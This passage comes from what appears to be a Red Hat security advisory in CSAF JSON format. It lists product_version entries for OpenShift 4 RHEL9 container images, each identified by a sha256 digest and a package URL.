"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-machine-approver-rhel9@sha256%3A4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557261"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-olm-rhel9-operator@sha256%3A3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605218"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-apiserver-rhel9-operator@sha256%3Ab654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606091"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-controller-manager-rhel9-operator@sha256%3Abce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572197"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"product_id": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ovirt-csi-driver-rhel9-operator@sha256%3Afe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604638"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-samples-rhel9-operator@sha256%3Add3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606091"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-update-keys-rhel9@sha256%3Ac805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604407"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"product_id": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-container-networking-plugins-rhel9@sha256%3A0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605056"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-resizer-rhel9@sha256%3A5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564121"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-snapshotter-rhel9@sha256%3A58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563469"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-snapshot-controller-rhel9@sha256%3A07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564451"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"product_id": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-etcd-rhel9@sha256%3Ace22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"product": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"product_id": "registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/frr-rhel9@sha256%3A2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cloud-controller-manager-rhel9@sha256%3Aac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557397"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cluster-api-controllers-rhel9@sha256%3A211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775562941"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-rhel9@sha256%3Ab3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602042"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-operator-rhel9@sha256%3Ae089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557339"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-cloud-controller-manager-rhel9@sha256%3Aa02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775561999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-vpc-block-csi-driver-rhel9@sha256%3A6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557304"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256%3Ad82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775566494"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibmcloud-cluster-api-controllers-rhel9@sha256%3Afd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572733"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibmcloud-machine-controllers-rhel9@sha256%3A8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775566505"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"product_id": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-image-customization-controller-rhel9@sha256%3A4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602040"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"product_id": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-insights-rhel9-operator@sha256%3Aed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573055"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"product_id": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-exporter-rhel9@sha256%3Ad426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"product_id": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-extractor-rhel9@sha256%3A5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565133"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"product_id": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-rhel9@sha256%3Af54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775612266"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-artifacts-rhel9@sha256%3A084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775612304"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"product": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"product_id": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kube-metrics-server-rhel9@sha256%3Aa832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605620"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"product_id": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-storage-version-migrator-rhel9@sha256%3A0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604115"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"product_id": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kubevirt-cloud-controller-manager-rhel9@sha256%3A3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565007"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"product_id": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kubevirt-csi-driver-rhel9@sha256%3A04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604912"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"product_id": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-libvirt-machine-controllers-rhel9@sha256%3Aaa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604362"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-rhel9-operator@sha256%3A7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-aws-rhel9@sha256%3A6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557712"
}
}
},
{
